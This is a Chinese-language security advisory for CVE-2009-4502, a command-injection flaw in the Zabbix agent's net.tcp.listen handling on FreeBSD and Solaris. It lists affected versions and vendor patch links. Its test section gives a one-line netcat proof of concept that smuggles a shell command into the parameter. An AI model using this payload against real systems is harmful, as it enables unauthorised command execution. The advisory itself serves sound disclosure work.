发布日期：2009-12-14
更新日期：2010-01-04

受影响系统：

ZABBIX SIA zabbix 1.x

不受影响系统：

ZABBIX SIA zabbix 1.9
ZABBIX SIA zabbix 1.6.6

描述：

---

BUGTRAQ  ID: 37306
CVE(CAN) ID: CVE-2009-4502

zabbix是一个CS结构的分布式网络监控系统。

当运行在FreeBSD或Solaris平台上时，Zabbix客户端的net.c文件中的NET_TCP_LISTEN函数允许远程攻击者绕过EnableRemoteCommands设置，通过提交给net.tcp.listen的参数中的元字符执行任意命令。仅有可信任的IP地址才可以执行这种攻击。

<*来源：Igor Danoshaites
  
  链接：http://secunia.com/advisories/37740/
        http://marc.info/?l=bugtraq&m=126080469513214&w=2
        http://marc.info/?l=bugtraq&m=126080469513214&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$> echo "net.tcp.listen[80';id >/tmp/ID ; echo ']"|nc testbox 10050

建议：

---

厂商补丁：

ZABBIX SIA
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://support.zabbix.com/browse/ZBX/fixforversion/10045
https://support.zabbix.com/browse/ZBX/fixforversion/10046

浏览次数：2724
严重程度：0（网友投票）